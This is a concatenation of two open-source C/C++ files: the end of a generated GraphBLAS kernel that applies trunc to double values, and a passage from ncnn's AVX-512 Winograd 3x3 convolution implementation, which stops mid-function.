// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
double aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = trunc (x) ;
// casting
#define GB_CAST(z, aij) \
double z = aij ;
// cij = op (aij)
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
double aij = Ax [pA] ; \
/* Cx [pC] = op (cast (aij)) */ \
double z = aij ; \
Cx [pC] = trunc (z) ; \
}
// true if operator is the identity op with no typecasting
#define GB_OP_IS_IDENTITY_WITH_NO_TYPECAST \
0
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_TRUNC || GxB_NO_FP64)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB (_unop_apply__trunc_fp64_fp64)
(
double *Cx, // Cx and Ax may be aliased
const double *Ax,
const int8_t *restrict Ab, // A->b if A is bitmap
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
// TODO: if OP is ONE and uniform-valued matrices are exploited, then
// do this in O(1) time
if (Ab == NULL)
{
#if ( GB_OP_IS_IDENTITY_WITH_NO_TYPECAST )
GB_memcpy (Cx, Ax, anz * sizeof (double), nthreads) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
double aij = Ax [p] ;
double z = aij ;
Cx [p] = trunc (z) ;
}
#endif
}
else
{
// bitmap case, no transpose; A->b already memcpy'd into C->b
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!Ab [p]) continue ;
double aij = Ax [p] ;
double z = aij ;
Cx [p] = trunc (z) ;
}
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB (_unop_tran__trunc_fp64_fp64)
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
convolution_3x3_pack16.h | // Tencent is pleased to support the open source community by making ncnn available.
//
// Copyright (C) 2022 THL A29 Limited, a Tencent company. All rights reserved.
//
// Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// https://opensource.org/licenses/BSD-3-Clause
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
static void conv3x3s1_winograd63_transform_kernel_pack16_avx512(const Mat& kernel, Mat& kernel_tm_pack8, int inch, int outch, const Option& opt)
{
// winograd63 transform kernel
Mat kernel_tm;
kernel_tm.create(8 * 8, inch, outch);
const float ktm[8][3] = {
{1.0f, 0.0f, 0.0f},
{-2.0f / 9, -2.0f / 9, -2.0f / 9},
{-2.0f / 9, 2.0f / 9, -2.0f / 9},
{1.0f / 90, 1.0f / 45, 2.0f / 45},
{1.0f / 90, -1.0f / 45, 2.0f / 45},
{1.0f / 45, 1.0f / 90, 1.0f / 180},
{1.0f / 45, -1.0f / 90, 1.0f / 180},
{0.0f, 0.0f, 1.0f}
};
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
for (int q = 0; q < inch; q++)
{
const float* kernel0 = (const float*)kernel + p * inch * 9 + q * 9;
float* kernel_tm0 = kernel_tm.channel(p).row(q);
// transform kernel, transposed
const float* k0 = kernel0;
const float* k1 = kernel0 + 3;
const float* k2 = kernel0 + 6;
// h
float tmp[8][3];
for (int i = 0; i < 8; i++)
{
tmp[i][0] = k0[0] * ktm[i][0] + k0[1] * ktm[i][1] + k0[2] * ktm[i][2];
tmp[i][1] = k1[0] * ktm[i][0] + k1[1] * ktm[i][1] + k1[2] * ktm[i][2];
tmp[i][2] = k2[0] * ktm[i][0] + k2[1] * ktm[i][1] + k2[2] * ktm[i][2];
}
// v
for (int j = 0; j < 8; j++)
{
float* tmpp = &tmp[j][0];
for (int i = 0; i < 8; i++)
{
kernel_tm0[j * 8 + i] = tmpp[0] * ktm[i][0] + tmpp[1] * ktm[i][1] + tmpp[2] * ktm[i][2];
}
}
}
}
// interleave
// src = 64-inch-outch
// dst = 16b-16a-inch/16a-64-outch/16b
kernel_tm_pack8.create(inch / 16, 64, outch / 16, (size_t)4u * 16 * 16, 16 * 16);
int q = 0;
for (; q + 15 < outch; q += 16)
{
Mat g0 = kernel_tm_pack8.channel(q / 16);
for (int k = 0; k < 64; k++)
{
float* g00 = g0.row(k);
for (int p = 0; p + 15 < inch; p += 16)
{
for (int i = 0; i < 16; i++)
{
for (int j = 0; j < 16; j++)
{
const float* k00 = kernel_tm.channel(q + j).row(p + i);
g00[0] = k00[k];
g00++;
}
}
}
}
}
}
static void conv3x3s1_winograd63_pack16_avx512(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel_tm, const Mat& bias, const Option& opt)
{
int w = bottom_blob.w;
int h = bottom_blob.h;
int inch = bottom_blob.c;
size_t elemsize = bottom_blob.elemsize;
int elempack = bottom_blob.elempack;
int outw = top_blob.w;
int outh = top_blob.h;
int outch = top_blob.c;
// pad to 6n+2
Mat bottom_blob_bordered = bottom_blob;
outw = (outw + 5) / 6 * 6;
outh = (outh + 5) / 6 * 6;
w = outw + 2;
h = outh + 2;
copy_make_border(bottom_blob, bottom_blob_bordered, 0, h - bottom_blob.h, 0, w - bottom_blob.w, BORDER_CONSTANT, 0.f, opt);
// BEGIN transform input
Mat bottom_blob_tm;
{
int w_tiles = outw / 6;
int h_tiles = outh / 6;
const int tiles = w_tiles * h_tiles;
bottom_blob_tm.create(tiles, 64, inch, elemsize, elempack, opt.workspace_allocator);
conv3x3s1_winograd63_transform_input_pack16_avx512(bottom_blob_bordered, bottom_blob_tm, opt);
}
bottom_blob_bordered = Mat();
// END transform input
// BEGIN dot
Mat top_blob_tm;
{
int w_tm = outw / 6 * 8;
int h_tm = outh / 6 * 8;
const int tiles = h_tm / 8 * w_tm / 8;
Mat bottom_blob_tm2;
if (tiles >= 12)
bottom_blob_tm2.create(12 * inch, tiles / 12 + (tiles % 12) / 8 + (tiles % 12 % 8) / 4 + (tiles % 12 % 4) / 2 + tiles % 12 % 2, 64, elemsize, elempack, opt.workspace_allocator);
else if (tiles >= 8)
bottom_blob_tm2.create(8 * inch, tiles / 8 + (tiles % 8) / 4 + (tiles % 4) / 2 + tiles % 2, 64, elemsize, elempack, opt.workspace_allocator);
else if (tiles >= 4)
bottom_blob_tm2.create(4 * inch, tiles / 4 + (tiles % 4) / 2 + tiles % 2, 64, elemsize, elempack, opt.workspace_allocator);
else if (tiles >= 2)
bottom_blob_tm2.create(2 * inch, tiles / 2 + tiles % 2, 64, elemsize, elempack, opt.workspace_allocator);
else // if (tiles >= 1)
bottom_blob_tm2.create(1 * inch, tiles, 64, elemsize, elempack, opt.workspace_allocator);
#pragma omp parallel for num_threads(opt.num_threads)
for (int r = 0; r < 64; r++)
{
Mat tm2 = bottom_blob_tm2.channel(r);
// tile
int i = 0;
for (; i + 11 < tiles; i += 12)
{
float* tmpptr = tm2.row(i / 12);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x12
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _r2 = _mm512_load_ps(r0 + 16 * 2);
__m512 _r3 = _mm512_load_ps(r0 + 16 * 3);
__m512 _r4 = _mm512_load_ps(r0 + 16 * 4);
__m512 _r5 = _mm512_load_ps(r0 + 16 * 5);
__m512 _r6 = _mm512_load_ps(r0 + 16 * 6);
__m512 _r7 = _mm512_load_ps(r0 + 16 * 7);
__m512 _r8 = _mm512_load_ps(r0 + 16 * 8);
__m512 _r9 = _mm512_load_ps(r0 + 16 * 9);
__m512 _ra = _mm512_load_ps(r0 + 16 * 10);
__m512 _rb = _mm512_load_ps(r0 + 16 * 11);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_unpacklo_ps(_r2, _r3);
__m512 _tmp3 = _mm512_unpackhi_ps(_r2, _r3);
__m512 _tmp4 = _mm512_unpacklo_ps(_r4, _r5);
__m512 _tmp5 = _mm512_unpackhi_ps(_r4, _r5);
__m512 _tmp6 = _mm512_unpacklo_ps(_r6, _r7);
__m512 _tmp7 = _mm512_unpackhi_ps(_r6, _r7);
__m512 _tmp8 = _mm512_unpacklo_ps(_r8, _r9);
__m512 _tmp9 = _mm512_unpackhi_ps(_r8, _r9);
__m512 _tmpa = _mm512_unpacklo_ps(_ra, _rb);
__m512 _tmpb = _mm512_unpackhi_ps(_ra, _rb);
__m512 _tmpc = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpd = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpe = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpf = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpg = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmph = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpi = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpj = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpk = _mm512_shuffle_ps(_tmp8, _tmpa, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpl = _mm512_shuffle_ps(_tmp8, _tmpa, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpm = _mm512_shuffle_ps(_tmp9, _tmpb, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpn = _mm512_shuffle_ps(_tmp9, _tmpb, _MM_SHUFFLE(3, 2, 3, 2));
_tmp0 = _mm512_shuffle_f32x4(_tmpc, _tmpg, _MM_SHUFFLE(2, 0, 2, 0));
_tmp1 = _mm512_shuffle_f32x4(_tmpk, _tmpd, _MM_SHUFFLE(2, 0, 2, 0));
_tmp2 = _mm512_shuffle_f32x4(_tmph, _tmpl, _MM_SHUFFLE(2, 0, 2, 0));
_tmp3 = _mm512_shuffle_f32x4(_tmpe, _tmpi, _MM_SHUFFLE(2, 0, 2, 0));
_tmp4 = _mm512_shuffle_f32x4(_tmpm, _tmpf, _MM_SHUFFLE(2, 0, 2, 0));
_tmp5 = _mm512_shuffle_f32x4(_tmpj, _tmpn, _MM_SHUFFLE(2, 0, 2, 0));
_tmp6 = _mm512_shuffle_f32x4(_tmpc, _tmpg, _MM_SHUFFLE(3, 1, 3, 1));
_tmp7 = _mm512_shuffle_f32x4(_tmpk, _tmpd, _MM_SHUFFLE(3, 1, 3, 1));
_tmp8 = _mm512_shuffle_f32x4(_tmph, _tmpl, _MM_SHUFFLE(3, 1, 3, 1));
_tmp9 = _mm512_shuffle_f32x4(_tmpe, _tmpi, _MM_SHUFFLE(3, 1, 3, 1));
_tmpa = _mm512_shuffle_f32x4(_tmpm, _tmpf, _MM_SHUFFLE(3, 1, 3, 1));
_tmpb = _mm512_shuffle_f32x4(_tmpj, _tmpn, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r2 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(2, 0, 2, 0));
_r3 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(2, 0, 2, 0));
_r4 = _mm512_shuffle_f32x4(_tmp8, _tmp9, _MM_SHUFFLE(2, 0, 2, 0));
_r5 = _mm512_shuffle_f32x4(_tmpa, _tmpb, _MM_SHUFFLE(2, 0, 2, 0));
_r6 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r7 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_r8 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(3, 1, 3, 1));
_r9 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(3, 1, 3, 1));
_ra = _mm512_shuffle_f32x4(_tmp8, _tmp9, _MM_SHUFFLE(3, 1, 3, 1));
_rb = _mm512_shuffle_f32x4(_tmpa, _tmpb, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
_mm512_store_ps(tmpptr + 16 * 2, _r2);
_mm512_store_ps(tmpptr + 16 * 3, _r3);
_mm512_store_ps(tmpptr + 16 * 4, _r4);
_mm512_store_ps(tmpptr + 16 * 5, _r5);
_mm512_store_ps(tmpptr + 16 * 6, _r6);
_mm512_store_ps(tmpptr + 16 * 7, _r7);
_mm512_store_ps(tmpptr + 16 * 8, _r8);
_mm512_store_ps(tmpptr + 16 * 9, _r9);
_mm512_store_ps(tmpptr + 16 * 10, _ra);
_mm512_store_ps(tmpptr + 16 * 11, _rb);
tmpptr += 192;
r0 += bottom_blob_tm.cstep * 16;
}
}
for (; i + 7 < tiles; i += 8)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x8
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _r2 = _mm512_load_ps(r0 + 16 * 2);
__m512 _r3 = _mm512_load_ps(r0 + 16 * 3);
__m512 _r4 = _mm512_load_ps(r0 + 16 * 4);
__m512 _r5 = _mm512_load_ps(r0 + 16 * 5);
__m512 _r6 = _mm512_load_ps(r0 + 16 * 6);
__m512 _r7 = _mm512_load_ps(r0 + 16 * 7);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_unpacklo_ps(_r2, _r3);
__m512 _tmp3 = _mm512_unpackhi_ps(_r2, _r3);
__m512 _tmp4 = _mm512_unpacklo_ps(_r4, _r5);
__m512 _tmp5 = _mm512_unpackhi_ps(_r4, _r5);
__m512 _tmp6 = _mm512_unpacklo_ps(_r6, _r7);
__m512 _tmp7 = _mm512_unpackhi_ps(_r6, _r7);
__m512 _tmp8 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmp9 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpa = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpb = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpc = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpd = _mm512_shuffle_ps(_tmp4, _tmp6, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmpe = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmpf = _mm512_shuffle_ps(_tmp5, _tmp7, _MM_SHUFFLE(3, 2, 3, 2));
_tmp0 = _mm512_shuffle_f32x4(_tmp8, _tmpc, _MM_SHUFFLE(2, 0, 2, 0));
_tmp1 = _mm512_shuffle_f32x4(_tmp9, _tmpd, _MM_SHUFFLE(2, 0, 2, 0));
_tmp2 = _mm512_shuffle_f32x4(_tmpa, _tmpe, _MM_SHUFFLE(2, 0, 2, 0));
_tmp3 = _mm512_shuffle_f32x4(_tmpb, _tmpf, _MM_SHUFFLE(2, 0, 2, 0));
_tmp4 = _mm512_shuffle_f32x4(_tmp8, _tmpc, _MM_SHUFFLE(3, 1, 3, 1));
_tmp5 = _mm512_shuffle_f32x4(_tmp9, _tmpd, _MM_SHUFFLE(3, 1, 3, 1));
_tmp6 = _mm512_shuffle_f32x4(_tmpa, _tmpe, _MM_SHUFFLE(3, 1, 3, 1));
_tmp7 = _mm512_shuffle_f32x4(_tmpb, _tmpf, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r2 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(2, 0, 2, 0));
_r3 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(2, 0, 2, 0));
_r4 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r5 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_r6 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(3, 1, 3, 1));
_r7 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
_mm512_store_ps(tmpptr + 16 * 2, _r2);
_mm512_store_ps(tmpptr + 16 * 3, _r3);
_mm512_store_ps(tmpptr + 16 * 4, _r4);
_mm512_store_ps(tmpptr + 16 * 5, _r5);
_mm512_store_ps(tmpptr + 16 * 6, _r6);
_mm512_store_ps(tmpptr + 16 * 7, _r7);
tmpptr += 128;
r0 += bottom_blob_tm.cstep * 16;
}
}
for (; i + 3 < tiles; i += 4)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x4
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _r2 = _mm512_load_ps(r0 + 16 * 2);
__m512 _r3 = _mm512_load_ps(r0 + 16 * 3);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_unpacklo_ps(_r2, _r3);
__m512 _tmp3 = _mm512_unpackhi_ps(_r2, _r3);
__m512 _tmp4 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmp5 = _mm512_shuffle_ps(_tmp0, _tmp2, _MM_SHUFFLE(3, 2, 3, 2));
__m512 _tmp6 = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(1, 0, 1, 0));
__m512 _tmp7 = _mm512_shuffle_ps(_tmp1, _tmp3, _MM_SHUFFLE(3, 2, 3, 2));
_tmp0 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(2, 0, 2, 0));
_tmp1 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(2, 0, 2, 0));
_tmp2 = _mm512_shuffle_f32x4(_tmp4, _tmp5, _MM_SHUFFLE(3, 1, 3, 1));
_tmp3 = _mm512_shuffle_f32x4(_tmp6, _tmp7, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r2 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r3 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
_mm512_store_ps(tmpptr + 16 * 2, _r2);
_mm512_store_ps(tmpptr + 16 * 3, _r3);
tmpptr += 64;
r0 += bottom_blob_tm.cstep * 16;
}
}
for (; i + 1 < tiles; i += 2)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
// transpose 16x2
__m512 _r0 = _mm512_load_ps(r0);
__m512 _r1 = _mm512_load_ps(r0 + 16);
__m512 _tmp0 = _mm512_unpacklo_ps(_r0, _r1);
__m512 _tmp1 = _mm512_unpackhi_ps(_r0, _r1);
__m512 _tmp2 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(2, 0, 2, 0));
__m512 _tmp3 = _mm512_shuffle_f32x4(_tmp0, _tmp1, _MM_SHUFFLE(3, 1, 3, 1));
_r0 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(2, 0, 2, 0));
_r1 = _mm512_shuffle_f32x4(_tmp2, _tmp3, _MM_SHUFFLE(3, 1, 3, 1));
_mm512_store_ps(tmpptr, _r0);
_mm512_store_ps(tmpptr + 16, _r1);
tmpptr += 32;
r0 += bottom_blob_tm.cstep * 16;
}
}
for (; i < tiles; i++)
{
float* tmpptr = tm2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2 + i % 12 % 2);
const float* r0 = bottom_blob_tm;
r0 += (r * tiles + i) * 16;
for (int q = 0; q < inch; q++)
{
__m512 _val = _mm512_load_ps(r0);
_mm512_store_ps(tmpptr, _val);
tmpptr += 16;
r0 += bottom_blob_tm.cstep * 16;
}
}
}
bottom_blob_tm = Mat();
// permute end
top_blob_tm.create(tiles, 64, outch, elemsize, elempack, opt.workspace_allocator);
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
float* output0_tm = top_blob_tm.channel(p);
const Mat kernel0_tm = kernel_tm.channel(p);
for (int r = 0; r < 64; r++)
{
const Mat bb2 = bottom_blob_tm2.channel(r);
int i = 0;
for (; i + 11 < tiles; i += 12)
{
const float* r0 = bb2.row(i / 12);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
__m512 _sum2 = _mm512_setzero_ps();
__m512 _sum3 = _mm512_setzero_ps();
__m512 _sum4 = _mm512_setzero_ps();
__m512 _sum5 = _mm512_setzero_ps();
__m512 _sum6 = _mm512_setzero_ps();
__m512 _sum7 = _mm512_setzero_ps();
__m512 _sum8 = _mm512_setzero_ps();
__m512 _sum9 = _mm512_setzero_ps();
__m512 _suma = _mm512_setzero_ps();
__m512 _sumb = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
__m512 _val2 = _mm512_set1_ps(r0[2]);
__m512 _val3 = _mm512_set1_ps(r0[3]);
_sum2 = _mm512_fmadd_ps(_val2, _w0, _sum2);
_sum3 = _mm512_fmadd_ps(_val3, _w0, _sum3);
__m512 _val4 = _mm512_set1_ps(r0[4]);
__m512 _val5 = _mm512_set1_ps(r0[5]);
_sum4 = _mm512_fmadd_ps(_val4, _w0, _sum4);
_sum5 = _mm512_fmadd_ps(_val5, _w0, _sum5);
__m512 _val6 = _mm512_set1_ps(r0[6]);
__m512 _val7 = _mm512_set1_ps(r0[7]);
_sum6 = _mm512_fmadd_ps(_val6, _w0, _sum6);
_sum7 = _mm512_fmadd_ps(_val7, _w0, _sum7);
__m512 _val8 = _mm512_set1_ps(r0[8]);
__m512 _val9 = _mm512_set1_ps(r0[9]);
_sum8 = _mm512_fmadd_ps(_val8, _w0, _sum8);
_sum9 = _mm512_fmadd_ps(_val9, _w0, _sum9);
__m512 _vala = _mm512_set1_ps(r0[10]);
__m512 _valb = _mm512_set1_ps(r0[11]);
_suma = _mm512_fmadd_ps(_vala, _w0, _suma);
_sumb = _mm512_fmadd_ps(_valb, _w0, _sumb);
r0 += 12;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
_mm512_store_ps(output0_tm + 16 * 2, _sum2);
_mm512_store_ps(output0_tm + 16 * 3, _sum3);
_mm512_store_ps(output0_tm + 16 * 4, _sum4);
_mm512_store_ps(output0_tm + 16 * 5, _sum5);
_mm512_store_ps(output0_tm + 16 * 6, _sum6);
_mm512_store_ps(output0_tm + 16 * 7, _sum7);
_mm512_store_ps(output0_tm + 16 * 8, _sum8);
_mm512_store_ps(output0_tm + 16 * 9, _sum9);
_mm512_store_ps(output0_tm + 16 * 10, _suma);
_mm512_store_ps(output0_tm + 16 * 11, _sumb);
output0_tm += 16 * 12;
}
for (; i + 7 < tiles; i += 8)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
__m512 _sum2 = _mm512_setzero_ps();
__m512 _sum3 = _mm512_setzero_ps();
__m512 _sum4 = _mm512_setzero_ps();
__m512 _sum5 = _mm512_setzero_ps();
__m512 _sum6 = _mm512_setzero_ps();
__m512 _sum7 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
__m512 _val2 = _mm512_set1_ps(r0[2]);
__m512 _val3 = _mm512_set1_ps(r0[3]);
_sum2 = _mm512_fmadd_ps(_val2, _w0, _sum2);
_sum3 = _mm512_fmadd_ps(_val3, _w0, _sum3);
__m512 _val4 = _mm512_set1_ps(r0[4]);
__m512 _val5 = _mm512_set1_ps(r0[5]);
_sum4 = _mm512_fmadd_ps(_val4, _w0, _sum4);
_sum5 = _mm512_fmadd_ps(_val5, _w0, _sum5);
__m512 _val6 = _mm512_set1_ps(r0[6]);
__m512 _val7 = _mm512_set1_ps(r0[7]);
_sum6 = _mm512_fmadd_ps(_val6, _w0, _sum6);
_sum7 = _mm512_fmadd_ps(_val7, _w0, _sum7);
r0 += 8;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
_mm512_store_ps(output0_tm + 16 * 2, _sum2);
_mm512_store_ps(output0_tm + 16 * 3, _sum3);
_mm512_store_ps(output0_tm + 16 * 4, _sum4);
_mm512_store_ps(output0_tm + 16 * 5, _sum5);
_mm512_store_ps(output0_tm + 16 * 6, _sum6);
_mm512_store_ps(output0_tm + 16 * 7, _sum7);
output0_tm += 16 * 8;
}
for (; i + 3 < tiles; i += 4)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
__m512 _sum2 = _mm512_setzero_ps();
__m512 _sum3 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
__m512 _val2 = _mm512_set1_ps(r0[2]);
__m512 _val3 = _mm512_set1_ps(r0[3]);
_sum2 = _mm512_fmadd_ps(_val2, _w0, _sum2);
_sum3 = _mm512_fmadd_ps(_val3, _w0, _sum3);
r0 += 4;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
_mm512_store_ps(output0_tm + 16 * 2, _sum2);
_mm512_store_ps(output0_tm + 16 * 3, _sum3);
output0_tm += 16 * 4;
}
for (; i + 1 < tiles; i += 2)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
r0 += 2;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
